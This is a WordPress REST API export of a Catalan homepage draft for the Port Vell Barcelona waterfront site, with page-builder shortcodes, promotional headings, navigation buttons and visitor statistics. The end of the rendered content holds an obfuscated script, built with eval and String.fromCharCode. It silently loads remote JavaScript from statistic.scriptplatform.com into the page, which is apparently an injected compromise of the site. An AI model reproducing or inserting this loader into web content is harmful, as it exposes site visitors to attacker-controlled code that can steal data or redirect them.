{"id":12023,"date":"2023-03-07T17:41:43","date_gmt":"2023-03-07T16:41:43","guid":{"rendered":"https:\/\/portvellbcn.cat\/?page_id=12023"},"modified":"2023-03-08T12:17:19","modified_gmt":"2023-03-08T11:17:19","slug":"pruf-home","status":"publish","type":"page","link":"https:\/\/portvellbcn.cat\/ca\/pruf-home\/","title":{"rendered":"Pruf-Home"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row full_width=&#8221;stretch_row_content&#8221; css=&#8221;.vc_custom_1612433157816{margin-top: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}&#8221; el_id=&#8221;video&#8221; el_class=&#8221;.vc-col-xs-margin-top-0&#8243;][vc_column css_animation=&#8221;fadeInDown&#8221; css=&#8221;.vc_custom_1553603988485{margin-bottom: 80px !important;}&#8221;][vc_raw_html css=&#8221;.vc_custom_1624349707855{padding-right: -30px !important;padding-left: -30px !important;}&#8221;]JTA5JTNDZGl2JTIwY2xhc3MlM0QlMjJ2aWRlby1iYWNrZ3JvdW5kJTIyJTNFJTBBJTA5JTA5JTNDdmlkZW8lMjBtdXRlZCUyMGlkJTNEJTIycGxheWVyJTIyJTIwcHJlbG9hZCUzRCUyMm5vbmUlMjIlMjBwb3N0ZXIlM0QlMjJ2aWRlbyUyRmJpZy1idWNrLWJ1bm55LmpwZyUyMiUyMGF1dG9wbGF5JTNEJTIyYXV0b3BsYXklMjIlMjBsb29wJTNEJTIybG9vcCUyMiUzRSUwQSUwOSUwOSUwOSUzQ3NvdXJjZSUyMHNyYyUzRCUyMmh0dHBzJTNBJTJGJTJGd3d3LnBvcnR2ZWxsYmNuLmNhdCUyRndwLWNvbnRlbnQlMkZ1cGxvYWRzJTJGMjAyMSUyRjA2JTJGUE9SVFZFTExfMjAyMV9DQVRfSDI2NF8yLm1wNCUyMiUyMHR5cGUlM0QlMjJ2aWRlbyUyRm1wNCUyMiUzRSUwQSUwOSUwOSUwOSUwQSUwOSUwOSUzQyUyRnZpZGVvJTNFJTBBJTA5JTA5JTNDZGl2JTIwaWQlM0QlMjJtdXRlJTIyJTIwY2xhc3MlM0QlMjJidG4lMjIlM0UlM0MlMkZkaXYlM0UlMEElM0MlMkZkaXYlM0U=[\/vc_raw_html][\/vc_column][\/vc_row][vc_row equal_height=&#8221;yes&#8221; content_placement=&#8221;middle&#8221; css=&#8221;.vc_custom_1612433103759{margin-top: 60px !important;margin-bottom: 80px !important;}&#8221; el_id=&#8221;inici&#8221;][vc_column css_animation=&#8221;fadeInDown&#8221; css=&#8221;.vc_custom_1553603988485{margin-bottom: 80px !important;}&#8221;][vc_animated_icon icon_sharpicons=&#8221;si-arrows-bottom-big-arrow-1&#8243; align=&#8221;center&#8221; css_animation=&#8221;none&#8221; color=&#8221;#ff6600&#8243; size=&#8221;50&#8243; el_class=&#8221;bounce&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center; letter-spacing: 4px;\"><span style=\"color: #999999; font-size: 14px;\"><span style=\"font-family: Rubik, sans-serif;\">EXPLORA EL PORT VELL<\/span><\/span><\/p>\n<p>[\/vc_column_text][\/vc_column][vc_column css_animation=&#8221;fadeInLeft&#8221; width=&#8221;1\/2&#8243;][vc_column_text css=&#8221;.vc_custom_1582614138113{margin-bottom: 25px !important;}&#8221;]<\/p>\n<p><span class=\"s1\" style=\"font-size: 50px; color: #333333;\"><span style=\"letter-spacing: 1px;\"><span style=\"line-height: 1.2em; display: inline-block; width: 100%;\"><span class=\"titulofuente\" style=\"font-family: 'Playfair Display', sans-serif;\">Un port, una ciutat, una hist\u00f2ria compartida entre Barcelona i la mar<\/span><\/span><\/span><\/span><\/p>\n<p>[\/vc_column_text][vc_btn title=&#8221;Veure m\u00e9s&#8221; style=&#8221;outline&#8221; shape=&#8221;round&#8221; color=&#8221;black&#8221; link=&#8221;url:https%3A%2F%2Fportvellbcn.cat%2Fqui-som%2F||target:%20_blank|&#8221; el_class=&#8221;boton1home&#8221;][\/vc_column][vc_column css_animation=&#8221;fadeInRight&#8221; width=&#8221;1\/2&#8243; css=&#8221;.vc_custom_1611662275510{padding-top: 170px !important;padding-bottom: 170px !important;background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2020\/12\/Foto_Historia_compartida_editada.jpg?id=7724) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][\/vc_column][\/vc_row][vc_row][vc_column][\/vc_column][\/vc_row][vc_section full_width=&#8221;stretch_row&#8221; css=&#8221;.vc_custom_1595315193967{padding-top: 10px !important;padding-bottom: 00px !important;}&#8221;][vc_row full_width=&#8221;stretch_row_content&#8221;][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1678274084318{padding-top: 200px !important;padding-bottom: 200px !important;background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2023\/03\/homepruf1.jpg?id=12040) !important;}&#8221;][vc_btn title=&#8221;Lloguer d&#8217;espais&#8221; style=&#8221;custom&#8221; custom_background=&#8221;#ff9804&#8243; custom_text=&#8221;#ffffff&#8221; shape=&#8221;round&#8221; size=&#8221;lg&#8221; align=&#8221;center&#8221; css=&#8221;.vc_custom_1678274181632{margin-top: 0px !important;padding-bottom: 30px !important;}&#8221; link=&#8221;url:https%3A%2F%2Fportvellbcn.cat%2Fca%2Flloguer-espais%2F|target:_blank&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1678274116494{padding-top: 200px !important;padding-bottom: 200px !important;background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2023\/03\/homepruf1.jpg?id=12040) !important;}&#8221;][vc_btn title=&#8221;Espais P\u00fablic&#8221; style=&#8221;custom&#8221; custom_background=&#8221;#ff9804&#8243; custom_text=&#8221;#ffffff&#8221; shape=&#8221;round&#8221; size=&#8221;lg&#8221; align=&#8221;center&#8221; css=&#8221;.vc_custom_1678273613806{margin-top: 0px !important;padding-bottom: 30px !important;}&#8221; link=&#8221;url:https%3A%2F%2Fportvellbcn.cat%2Fca%2Fsingle-work%2Fespai-public%2F|target:_blank&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1678274130285{padding-top: 200px !important;padding-bottom: 200px !important;background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2023\/03\/homepruf1.jpg?id=12040) !important;}&#8221;][vc_btn title=&#8221;Explora el Port Vell&#8221; style=&#8221;custom&#8221; custom_background=&#8221;#ff9804&#8243; custom_text=&#8221;#ffffff&#8221; shape=&#8221;round&#8221; size=&#8221;lg&#8221; align=&#8221;center&#8221; css=&#8221;.vc_custom_1678273620574{margin-top: 0px !important;padding-bottom: 30px !important;}&#8221; link=&#8221;url:https%3A%2F%2Fportvellbcn.cat%2Fca%2Fexplora-portvell%2F|target:_blank&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1678274143426{padding-top: 200px !important;padding-bottom: 200px !important;background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2023\/03\/homepruf1.jpg?id=12040) !important;}&#8221;][vc_btn title=&#8221;Activitats&#8221; style=&#8221;custom&#8221; custom_background=&#8221;#ff9804&#8243; custom_text=&#8221;#ffffff&#8221; shape=&#8221;round&#8221; size=&#8221;lg&#8221; align=&#8221;center&#8221; css=&#8221;.vc_custom_1678274235407{margin-top: 0px !important;padding-bottom: 30px !important;}&#8221; link=&#8221;url:https%3A%2F%2Fportvellbcn.cat%2Fca%2Factivitats-al-port-vell-bcn%2F|target:_blank&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; content_placement=&#8221;middle&#8221; parallax=&#8221;content-moving&#8221; parallax_speed_bg=&#8221;1.7&#8243; css=&#8221;.vc_custom_1561019507933{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 20px !important;padding-bottom: 0px !important;background-color: #ffffff !important;background-position: center;background-repeat: no-repeat !important;background-size: cover !important;}&#8221;][vc_column css_animation=&#8221;fadeInUp&#8221; width=&#8221;3\/4&#8243;][vc_column_text css_animation=&#8221;none&#8221; css=&#8221;.vc_custom_1612424133391{margin-bottom: 0px !important;}&#8221;]<\/p>\n<p><strong><span class=\"s1\" style=\"font-size: 30px; color: #333333;\"><span style=\"letter-spacing: 1px;\"><span style=\"line-height: 1.2em; display: inline-block; width: 100%;\"><span class=\"titulofuente\" style=\"font-family: 'Playfair Display', sans-serif;\">Acc\u00e9s a la plataforma de Licitaci\u00f3 Electr\u00f2nica de la Ger\u00e8ncia Urban\u00edstica del Port Vell\u00a0<\/span><\/span><\/span><\/span><\/strong><\/p>\n<p>[\/vc_column_text][\/vc_column][vc_column css_animation=&#8221;fadeInUp&#8221; width=&#8221;1\/4&#8243;][vc_btn title=&#8221;VEURE M\u00c9S&#8221; style=&#8221;custom&#8221; custom_background=&#8221;#0073cf&#8221; custom_text=&#8221;#ffffff&#8221; shape=&#8221;round&#8221; size=&#8221;lg&#8221; css=&#8221;.vc_custom_1554112476586{margin-top: 0px !important;padding-bottom: 30px !important;}&#8221; link=&#8221;url:https%3A%2F%2Fcommunity.vortal.biz%2FPRODSTS%2FUsers%2FLogin%2FIndex%3FSkinName%3Dportvell||target:%20_blank|&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row_content_no_spaces&#8221; css=&#8221;.vc_custom_1612422928898{background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2021\/02\/aerea-portvell-02.jpg?id=9117) !important;}&#8221;][vc_column css=&#8221;.vc_custom_1612424217145{padding-top: 150px !important;padding-bottom: 150px !important;}&#8221;][vc_row_inner][vc_column_inner width=&#8221;1\/4&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><span class=\"s1\" style=\"font-size: 53px; color: #ffffff;\"><span style=\"letter-spacing: 1px;\"><span style=\"line-height: 1.2em; display: inline-block; width: 100%;\"><span class=\"titulofuente\" style=\"font-family: 'Playfair Display', sans-serif;\">El Port Vell, El port-ciutat<br \/>\nde Barcelona<\/span><\/span><\/span><\/span><\/p>\n<p>[\/vc_column_text][vc_btn title=&#8221;Veure m\u00e9s&#8221; style=&#8221;outline&#8221; shape=&#8221;round&#8221; align=&#8221;center&#8221; link=&#8221;url:https%3A%2F%2Fportvellbcn.cat%2Fque-es-portvell%2F||target:%20_blank|&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; equal_height=&#8221;yes&#8221; content_placement=&#8221;middle&#8221; vidbg_vc_tap_to_unmute=&#8221;true&#8221; css=&#8221;.vc_custom_1595315275127{margin-top: 0px !important;padding-top: 50px !important;padding-bottom: 60px !important;}&#8221; el_id=&#8221;final&#8221;][vc_column css=&#8221;.vc_custom_1553603804501{border-bottom-width: 150px !important;}&#8221;][vc_column_text css_animation=&#8221;fadeInDown&#8221; css=&#8221;.vc_custom_1553603821613{border-bottom-width: 150px !important;}&#8221;]<\/p>\n<p style=\"text-align: center; letter-spacing: 4px;\"><span style=\"color: #999999; font-size: 14px;\"><span style=\"font-family: Oswald, sans-serif;\"><span style=\"font-family: Rubik, sans-serif;\">XIFRES I DADES<\/span><\/span><\/span><\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][\/vc_section][vc_row css=&#8221;.vc_custom_1595315244083{padding-bottom: 60px !important;}&#8221;][vc_column width=&#8221;1\/4&#8243;][vc_counter align=&#8221;center&#8221; google_fonts=&#8221;font_family:Poppins%3A300%2Cregular%2C500%2C600%2C700|font_style:400%20regular%3A400%3Anormal&#8221; start=&#8221;0&#8243; end=&#8221;70&#8243; speed=&#8221;4&#8243; font_size=&#8221;70&#8243; color=&#8221;#ff6600&#8243; css=&#8221;.vc_custom_1563527822687{margin-bottom: 20px !important;}&#8221;][vc_custom_heading text=&#8221;Hect\u00e0rees de territori&#8221; font_container=&#8221;tag:h6|text_align:center|color:%23161616&#8243; google_fonts=&#8221;font_family:Poppins%3A300%2Cregular%2C500%2C600%2C700|font_style:400%20regular%3A400%3Anormal&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243;][vc_counter align=&#8221;center&#8221; google_fonts=&#8221;font_family:Poppins%3A300%2Cregular%2C500%2C600%2C700|font_style:400%20regular%3A400%3Anormal&#8221; start=&#8221;0&#8243; end=&#8221;330&#8243; speed=&#8221;4&#8243; font_size=&#8221;70&#8243; color=&#8221;#ff6600&#8243; css=&#8221;.vc_custom_1563527862171{margin-bottom: 20px !important;}&#8221;][vc_custom_heading text=&#8221;Empreses&#8221; font_container=&#8221;tag:h6|text_align:center|color:%23161616&#8243; google_fonts=&#8221;font_family:Poppins%3A300%2Cregular%2C500%2C600%2C700|font_style:400%20regular%3A400%3Anormal&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243;][vc_counter align=&#8221;center&#8221; google_fonts=&#8221;font_family:Poppins%3A300%2Cregular%2C500%2C600%2C700|font_style:400%20regular%3A400%3Anormal&#8221; start=&#8221;0&#8243; end=&#8221;7500&#8243; speed=&#8221;4&#8243; font_size=&#8221;70&#8243; color=&#8221;#ff6600&#8243; css=&#8221;.vc_custom_1612355395607{margin-bottom: 20px !important;}&#8221;][vc_custom_heading text=&#8221;Llocs de treballs&#8221; font_container=&#8221;tag:h6|text_align:center|color:%23161616&#8243; google_fonts=&#8221;font_family:Poppins%3A300%2Cregular%2C500%2C600%2C700|font_style:400%20regular%3A400%3Anormal&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243;][vc_counter align=&#8221;center&#8221; google_fonts=&#8221;font_family:Poppins%3A300%2Cregular%2C500%2C600%2C700|font_style:400%20regular%3A400%3Anormal&#8221; start=&#8221;0&#8243; end=&#8221;365&#8243; speed=&#8221;4&#8243; font_size=&#8221;70&#8243; color=&#8221;#ff6600&#8243; css=&#8221;.vc_custom_1563527843562{margin-bottom: 20px !important;}&#8221;][vc_custom_heading text=&#8221;Dies d\u2019esdeveniments a l\u2019any&#8221; font_container=&#8221;tag:h6|text_align:center|color:%23161616&#8243; google_fonts=&#8221;font_family:Poppins%3A300%2Cregular%2C500%2C600%2C700|font_style:400%20regular%3A400%3Anormal&#8221;][\/vc_column][\/vc_row]<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row full_width=&#8221;stretch_row_content&#8221; css=&#8221;.vc_custom_1612433157816{margin-top: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}&#8221; el_id=&#8221;video&#8221; el_class=&#8221;.vc-col-xs-margin-top-0&#8243;][vc_column css_animation=&#8221;fadeInDown&#8221; css=&#8221;.vc_custom_1553603988485{margin-bottom: 80px !important;}&#8221;][vc_raw_html css=&#8221;.vc_custom_1624349707855{padding-right: -30px !important;padding-left: -30px !important;}&#8221;]JTA5JTNDZGl2JTIwY2xhc3MlM0QlMjJ2aWRlby1iYWNrZ3JvdW5kJTIyJTNFJTBBJTA5JTA5JTNDdmlkZW8lMjBtdXRlZCUyMGlkJTNEJTIycGxheWVyJTIyJTIwcHJlbG9hZCUzRCUyMm5vbmUlMjIlMjBwb3N0ZXIlM0QlMjJ2aWRlbyUyRmJpZy1idWNrLWJ1bm55LmpwZyUyMiUyMGF1dG9wbGF5JTNEJTIyYXV0b3BsYXklMjIlMjBsb29wJTNEJTIybG9vcCUyMiUzRSUwQSUwOSUwOSUwOSUzQ3NvdXJjZSUyMHNyYyUzRCUyMmh0dHBzJTNBJTJGJTJGd3d3LnBvcnR2ZWxsYmNuLmNhdCUyRndwLWNvbnRlbnQlMkZ1cGxvYWRzJTJGMjAyMSUyRjA2JTJGUE9SVFZFTExfMjAyMV9DQVRfSDI2NF8yLm1wNCUyMiUyMHR5cGUlM0QlMjJ2aWRlbyUyRm1wNCUyMiUzRSUwQSUwOSUwOSUwOSUwQSUwOSUwOSUzQyUyRnZpZGVvJTNFJTBBJTA5JTA5JTNDZGl2JTIwaWQlM0QlMjJtdXRlJTIyJTIwY2xhc3MlM0QlMjJidG4lMjIlM0UlM0MlMkZkaXYlM0UlMEElM0MlMkZkaXYlM0U=[\/vc_raw_html][\/vc_column][\/vc_row][vc_row equal_height=&#8221;yes&#8221; content_placement=&#8221;middle&#8221; css=&#8221;.vc_custom_1612433103759{margin-top: 60px !important;margin-bottom: 80px !important;}&#8221; el_id=&#8221;inici&#8221;][vc_column css_animation=&#8221;fadeInDown&#8221; css=&#8221;.vc_custom_1553603988485{margin-bottom: 80px !important;}&#8221;][vc_animated_icon icon_sharpicons=&#8221;si-arrows-bottom-big-arrow-1&#8243; align=&#8221;center&#8221; css_animation=&#8221;none&#8221; color=&#8221;#ff6600&#8243; size=&#8221;50&#8243; el_class=&#8221;bounce&#8221;][vc_column_text] EXPLORA EL PORT VELL [\/vc_column_text][\/vc_column][vc_column css_animation=&#8221;fadeInLeft&#8221; width=&#8221;1\/2&#8243;][vc_column_text css=&#8221;.vc_custom_1582614138113{margin-bottom: 25px !important;}&#8221;] Un port, una ciutat, una hist\u00f2ria compartida entre Barcelona i la mar [\/vc_column_text][vc_btn title=&#8221;Veure m\u00e9s&#8221; style=&#8221;outline&#8221; shape=&#8221;round&#8221; color=&#8221;black&#8221; link=&#8221;url:https%3A%2F%2Fportvellbcn.cat%2Fqui-som%2F||target:%20_blank|&#8221; el_class=&#8221;boton1home&#8221;][\/vc_column][vc_column css_animation=&#8221;fadeInRight&#8221; width=&#8221;1\/2&#8243; css=&#8221;.vc_custom_1611662275510{padding-top: 170px !important;padding-bottom: 170px !important;background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2020\/12\/Foto_Historia_compartida_editada.jpg?id=7724) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][\/vc_column][\/vc_row][vc_row][vc_column][\/vc_column][\/vc_row][vc_section full_width=&#8221;stretch_row&#8221; css=&#8221;.vc_custom_1595315193967{padding-top: 10px !important;padding-bottom: 00px !important;}&#8221;][vc_row full_width=&#8221;stretch_row_content&#8221;][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1678274084318{padding-top: 200px !important;padding-bottom: 200px !important;background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2023\/03\/homepruf1.jpg?id=12040) !important;}&#8221;][vc_btn title=&#8221;Lloguer d&#8217;espais&#8221; style=&#8221;custom&#8221; custom_background=&#8221;#ff9804&#8243; custom_text=&#8221;#ffffff&#8221; shape=&#8221;round&#8221; size=&#8221;lg&#8221; align=&#8221;center&#8221; css=&#8221;.vc_custom_1678274181632{margin-top: 0px !important;padding-bottom: 30px !important;}&#8221; link=&#8221;url:https%3A%2F%2Fportvellbcn.cat%2Fca%2Flloguer-espais%2F|target:_blank&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1678274116494{padding-top: 200px !important;padding-bottom: 200px !important;background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2023\/03\/homepruf1.jpg?id=12040) !important;}&#8221;][vc_btn title=&#8221;Espais P\u00fablic&#8221; style=&#8221;custom&#8221; custom_background=&#8221;#ff9804&#8243; custom_text=&#8221;#ffffff&#8221; shape=&#8221;round&#8221; size=&#8221;lg&#8221; align=&#8221;center&#8221; css=&#8221;.vc_custom_1678273613806{margin-top: 0px !important;padding-bottom: 30px !important;}&#8221; link=&#8221;url:https%3A%2F%2Fportvellbcn.cat%2Fca%2Fsingle-work%2Fespai-public%2F|target:_blank&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1678274130285{padding-top: 200px !important;padding-bottom: 200px !important;background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2023\/03\/homepruf1.jpg?id=12040) !important;}&#8221;][vc_btn title=&#8221;Explora el Port Vell&#8221; style=&#8221;custom&#8221; custom_background=&#8221;#ff9804&#8243; custom_text=&#8221;#ffffff&#8221; shape=&#8221;round&#8221; size=&#8221;lg&#8221; align=&#8221;center&#8221; css=&#8221;.vc_custom_1678273620574{margin-top: 0px !important;padding-bottom: 30px !important;}&#8221; link=&#8221;url:https%3A%2F%2Fportvellbcn.cat%2Fca%2Fexplora-portvell%2F|target:_blank&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1678274143426{padding-top: 200px !important;padding-bottom: 200px !important;background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2023\/03\/homepruf1.jpg?id=12040) !important;}&#8221;][vc_btn title=&#8221;Activitats&#8221; style=&#8221;custom&#8221; custom_background=&#8221;#ff9804&#8243; custom_text=&#8221;#ffffff&#8221; shape=&#8221;round&#8221; size=&#8221;lg&#8221; align=&#8221;center&#8221; css=&#8221;.vc_custom_1678274235407{margin-top: 0px !important;padding-bottom: 30px !important;}&#8221; link=&#8221;url:https%3A%2F%2Fportvellbcn.cat%2Fca%2Factivitats-al-port-vell-bcn%2F|target:_blank&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; content_placement=&#8221;middle&#8221; parallax=&#8221;content-moving&#8221; parallax_speed_bg=&#8221;1.7&#8243; css=&#8221;.vc_custom_1561019507933{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 20px !important;padding-bottom: 0px !important;background-color: #ffffff !important;background-position: [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-12023","page","type-page","status-publish","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/pages\/12023","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/comments?post=12023"}],"version-history":[{"count":0,"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/pages\/12023\/revisions"}],"wp:attachment":[{"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/media?parent=12023"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}